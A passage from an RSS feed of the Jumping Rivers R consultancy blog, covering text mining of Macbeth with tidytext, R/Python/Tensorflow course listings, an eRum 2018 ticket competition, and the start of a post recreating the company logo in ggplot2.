&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;zoo&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;He downloaded the “Scottish Play” via the &lt;a href="https://cran.r-project.org/web/packages/gutenbergr/index.html" rel="external"&gt;Gutenbergr&lt;/a&gt; package&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;macbeth &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gutenberg_works&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Macbeth&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gutenberg_download&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then proceeded to generate a bar chart of the top \(10\) words (excluding stop words such as &lt;em&gt;and&lt;/em&gt;, &lt;em&gt;to&lt;/em&gt;), via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;macbeth &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unnest_tokens&lt;/span&gt;(word, text) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Make text tidy&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;count&lt;/span&gt;(word, sort &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Count occurances&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;anti_join&lt;/span&gt;(stop_words, by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;word&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Remove stop words&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Select top 10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(word, n)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="tidy.svg" style="width:500px; class:image-center"&gt;
&lt;p&gt;The two key parts of this code are&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;unnest_tokens()&lt;/code&gt; - used to tidy the text;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;anti_join()&lt;/code&gt; - remove any &lt;code&gt;stop_words&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Since this analysis was “off the cuff”, Dave noticed that we could easily extract the speaker. This is clearly something you would want to store and can be achieved via a some &lt;code&gt;mutate()&lt;/code&gt; magic&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;speaker_words &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; macbeth &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(is_speaker &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_detect&lt;/span&gt;(text, &lt;span style="color:#a5d6ff"&gt;&amp;#34;^[A-Z ]+\\.$&amp;#34;&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# Detect capital letters&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; speaker &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ifelse&lt;/span&gt;(is_speaker, text, &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; speaker &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;na.locf&lt;/span&gt;(speaker, na.rm &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;str_detect()&lt;/code&gt; uses a simple regular expression to determine if the text are capital letters (theyby indicating a scene). Any expression of length zero is replaced, by a missing value &lt;code&gt;NA&lt;/code&gt;. Before finishing with the {zoo} &lt;code&gt;na.locf()&lt;/code&gt; function to carry the last observation forward, thereby filling the blanks.&lt;/p&gt;
&lt;p&gt;The resulting tibble is then cleaned using&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;speaker_words &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; speaker_words &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;is_speaker, &lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.na&lt;/span&gt;(speaker)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;is_speaker, &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;gutenberg_id) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unnest_tokens&lt;/span&gt;(word, text) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;anti_join&lt;/span&gt;(stop_words, by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;word&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A further bit of analysis gives&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;speaker_words &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;count&lt;/span&gt;(speaker, word, sort &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;bind_tf_idf&lt;/span&gt;(word, speaker, n) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(tf_idf)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(n &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 107 x 6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## speaker word n tf idf tf_idf&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 PORTER. knock 10 0.0847 3.09 0.262&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 ALL. double 6 0.0588 2.40 0.141&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 PORTER. knocking 6 0.0508 2.40 0.122&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 APPARITION. macbeth 5 0.143 0.788 0.113&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 LADY MACDUFF. thou 5 0.0394 1.30 0.0512&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 PORTER. sir 5 0.0424 1.15 0.0485&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 DUNCAN. thee 6 0.0270 1.30 0.0351&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 FIRST WITCH. macbeth 7 0.0417 0.788 0.0329&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 LADY MACBETH. wouldst 6 0.00825 3.78 0.0312&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 MACDUFF. scotland 8 0.0154 1.99 0.0306&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ... with 97 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In my opinion, the best part of the night was the lively question and answer session. The questions were on numerous topics (I didn’t write them down sorry!), that Dave handled with ease, usually with another off-the-cuff demo.&lt;/p&gt;
&lt;h4 id="further-links"&gt;Further Links&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://edinbr.org/" rel="external"&gt;Edinburgh R user group&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Text mining with R: &lt;a href="http://amzn.to/2CDzvYD" rel="external"&gt;amazon&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Dave Robinson: &lt;a href="https://twitter.com/drob" rel="external"&gt;twitter&lt;/a&gt;, &lt;a href="http://varianceexplained.org/about/" rel="external"&gt;blog&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=h--HR7PWfp0" rel="external"&gt;Blackadder&lt;/a&gt; discusses the Scottish play&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/edinbr-text-mining-with-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R &amp; Python Machine Learning Courses</title><link>https://www.jumpingrivers.com/blog/r-python-machine-learning-courses/</link><pubDate>Wed, 07 Feb 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-python-machine-learning-courses/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-python-machine-learning-courses/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-python-machine-learning-courses/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Hi there!&lt;/p&gt;
&lt;p&gt;We’re running some courses on R, Python and Tensorflow around the UK that you might be interested in! All courses are spearheaded with lectures by one of our first-class trainers. The lectures are interspersed with practicals and coffee breaks. Attendees get a set of in-depth notes to pair with the lecture. More details and information on prerequisite knowledge are available on our &lt;a href="https://www.jumpingrivers.com/training/all-courses/"&gt;course description page&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;All participants must bring their own laptop.&lt;/p&gt;
&lt;h3 id="leeds-predictive-analytics-in-r"&gt;Leeds (Predictive Analytics in R)&lt;/h3&gt;
&lt;h4 id="predictive-analytics-in-r---feb-1314"&gt;Predictive Analytics in R - Feb 13/14&lt;/h4&gt;
&lt;p&gt;By the end of the course, participants will have the skills and knowledge to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Thoroughly understand popular analytical techniques practised in industry today.&lt;/li&gt;
&lt;li&gt;Understand which technique applies to their own data.&lt;/li&gt;
&lt;li&gt;Efficiently and effectively analyse their own data using said techniques in R.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Topics include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Introduction to analytics&lt;/li&gt;
&lt;li&gt;Simple regression problems&lt;/li&gt;
&lt;li&gt;Classification&lt;/li&gt;
&lt;li&gt;Model selection&lt;/li&gt;
&lt;li&gt;Advanced regression techniques&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;See the &lt;a href="https://www.jumpingrivers.com/training/course/r-predictive-analytics-machine-learning/"&gt;course page&lt;/a&gt; for booking details.&lt;/p&gt;
&lt;h3 id="london-tensorflow"&gt;London (Tensorflow)&lt;/h3&gt;
&lt;h4 id="introduction-to-python---apr-0910"&gt;Introduction to Python - Apr 09/10&lt;/h4&gt;
&lt;p&gt;By the end of the course participants will be able to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;understand Python such that they can proficiently write reusable Python code&lt;/li&gt;
&lt;li&gt;write more efficient Python code using functions &amp;amp; If and While loops&lt;/li&gt;
&lt;li&gt;read, write and analyse their own data using Python&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Topics include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The Python Syntax&lt;/li&gt;
&lt;li&gt;Data types&lt;/li&gt;
&lt;li&gt;List, Tuples and Dictionaries&lt;/li&gt;
&lt;li&gt;Loops, If and While&lt;/li&gt;
&lt;li&gt;Writing functions&lt;/li&gt;
&lt;li&gt;Dealing with files&lt;/li&gt;
&lt;li&gt;Pandas&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;See the &lt;a href="https://www.jumpingrivers.com/training/course/introduction-python-data-science/"&gt;course page&lt;/a&gt; for booking details.&lt;/p&gt;
&lt;h4 id="python--tensorflow---apr-1112"&gt;Python &amp;amp; Tensorflow - Apr 11/12&lt;/h4&gt;
&lt;p&gt;Deep learning is a cutting edge machine learning technique for classification and regression. In the past few years it has produced state-of-the-art results in fields such as image classification, natural language processing, bioinformatics and robotics. This course will cover the main ideas of deep learning, and how to implement it in practice with tensorflow: a software framework for efficient and scalable deep learning.&lt;/p&gt;
&lt;p&gt;Topics include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Supervised learning&lt;/li&gt;
&lt;li&gt;Multilayer perceptrons&lt;/li&gt;
&lt;li&gt;Training neural networks&lt;/li&gt;
&lt;li&gt;Deep learning&lt;/li&gt;
&lt;li&gt;Tuning&lt;/li&gt;
&lt;li&gt;Convolutional neural networks&lt;/li&gt;
&lt;li&gt;Scaling to big data using GPUs&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;See the &lt;a href="https://www.jumpingrivers.com/training/course/python-tensorflow-machine-learning/"&gt;course page&lt;/a&gt; for booking details.&lt;/p&gt;
&lt;h3 id="birmingham-python--machine-learning"&gt;Birmingham (Python &amp;amp; Machine Learning)&lt;/h3&gt;
&lt;h4 id="machine-learning-with-python---end-of-april"&gt;Machine learning with Python - end of April&lt;/h4&gt;
&lt;p&gt;This course will provide you with the fundamental tools you’ll need to prepare data and then train and test Machine Learning models.&lt;/p&gt;
&lt;p&gt;Topics include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Data frames&lt;/li&gt;
&lt;li&gt;Cleaning data&lt;/li&gt;
&lt;li&gt;Merging/joining data&lt;/li&gt;
&lt;li&gt;Grouping/aggregation on data&lt;/li&gt;
&lt;li&gt;Categorical data&lt;/li&gt;
&lt;li&gt;What is machine learning?&lt;/li&gt;
&lt;li&gt;Scikit-Learn&lt;/li&gt;
&lt;li&gt;Linear regression&lt;/li&gt;
&lt;li&gt;Logistic regression&lt;/li&gt;
&lt;li&gt;Decision trees&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This course will be led by &lt;a href="https://twitter.com/DataWookie" rel="external"&gt;Andrew Collier&lt;/a&gt;, a very experienced data scientist from South Africa!&lt;/p&gt;
&lt;p&gt;See the &lt;a href="https://www.jumpingrivers.com/training/course/python-machine-learning/"&gt;course page&lt;/a&gt; for booking details.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-python-machine-learning-courses/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Free ticket to eRum</title><link>https://www.jumpingrivers.com/blog/free-ticket-to-erum/</link><pubDate>Fri, 02 Feb 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/free-ticket-to-erum/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/free-ticket-to-erum/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/free-ticket-to-erum/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;So… big news.&lt;/p&gt;
&lt;p&gt;Jumping Rivers is sponsoring &lt;a href="http://2018.erum.io/" rel="external"&gt;eRum 2018&lt;/a&gt; and in light of this news we are giving away a free place at the conference!&lt;/p&gt;
&lt;p&gt;&lt;em&gt;(Not to mention our very own lead consultant, Colin Gillespie, is one of the invited speakers.)&lt;/em&gt;&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-free-ticket-to-erum"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="the-main-competition"&gt;The Main Competition&lt;/h2&gt;
&lt;p&gt;Here at &lt;a href="https://jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt;, we maintain the site &lt;a href="https://jumpingrivers.github.io/meetingsR/" rel="external"&gt;meetingsR&lt;/a&gt;. This comprises of three comprehensive lists:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;All upcoming (and foregone) R conferences.&lt;/li&gt;
&lt;li&gt;All R useR groups from around the globe.&lt;/li&gt;
&lt;li&gt;All R-Ladies groups from around the globe.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;See the &lt;a href="https://github.com/jumpingrivers/meetingsR/" rel="external"&gt;GitHub repo&lt;/a&gt; for the contents.&lt;/p&gt;
&lt;p&gt;All we are asking for is a visualisation or dashboard of meetingsR. For example, it could be a visualisation of the useR group locations, or a dashboard based on the conference costs or …&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The best one wins a free place at eRum 2018!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;To give the winner apt time to prepare for their trip to Budapest in May, the deadline will be &lt;strong&gt;5pm&lt;/strong&gt; on &lt;strong&gt;Monday 2nd April&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Not only that, but if we feel like the winners solution fits the meetingsR site, we’ll incorporate it in the site! Credit given, of course.&lt;/p&gt;
&lt;p&gt;Solutions should be e-mailed to &lt;em&gt;&lt;a href="mailto:theo@jumpingrivers.com" rel="external"&gt;theo@jumpingrivers.com&lt;/a&gt;&lt;/em&gt; and if possible they should be held on a public repository on something such as GitHub.&lt;/p&gt;
&lt;p&gt;Good luck!&lt;/p&gt;
&lt;h2 id="the-secondary-competition"&gt;The Secondary Competition&lt;/h2&gt;
&lt;p&gt;Regardless of the visualisation, we’ll need an R script to parse the current &lt;code&gt;.Rmd&lt;/code&gt; files and extract the conference and group urls &amp;amp; locations. Rather than have everyone suffering parsing hell, we’ll send a free copy of &lt;a href="http://shop.oreilly.com/product/0636920047995.do" rel="external"&gt;Efficient R Programming&lt;/a&gt; to the first reasonable attempt at a parsing script (if we have a few scripts, we can send more than one copy).&lt;/p&gt;
&lt;p&gt;Just email &lt;em&gt;&lt;a href="mailto:theo@jumpingrivers.com" rel="external"&gt;theo@jumpingrivers.com&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/free-ticket-to-erum/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Our Logo In R</title><link>https://www.jumpingrivers.com/blog/our-logo-in-r/</link><pubDate>Thu, 01 Feb 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/our-logo-in-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/our-logo-in-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/our-logo-in-r/plot4.svg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Hi all, so given our logo here at Jumping Rivers is a set of lines designed to look like a Gaussian Process, we thought it would be a neat idea to recreate this image in R. To do so we’re going to need a couple packages. We do the usual &lt;code&gt;install.packages()&lt;/code&gt; dance (remember this step can be performed in &lt;a href="https://www.jumpingrivers.com/blog/speeding-up-package-installation/"&gt;parallel&lt;/a&gt;).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;ggalt&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-our-logo-in-r"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;We’re also going to need the data containing the points for the lines and which set of points belongs to which line. There is a Gist available to download via &lt;a href="https://gist.github.com/jumpingrivers/6e88357ef28697c612bb5553251a473d" rel="external"&gt;Jumping Rivers&lt;/a&gt;. To read in the CSV file we’re going to use the raw data link.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(dd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; readr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_csv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://goo.gl/HzNbAp&amp;#34;&lt;/span&gt;, col_types &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;ddc&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 40 x 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## x y type&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 36.9 -311 1&lt;/span&gt;
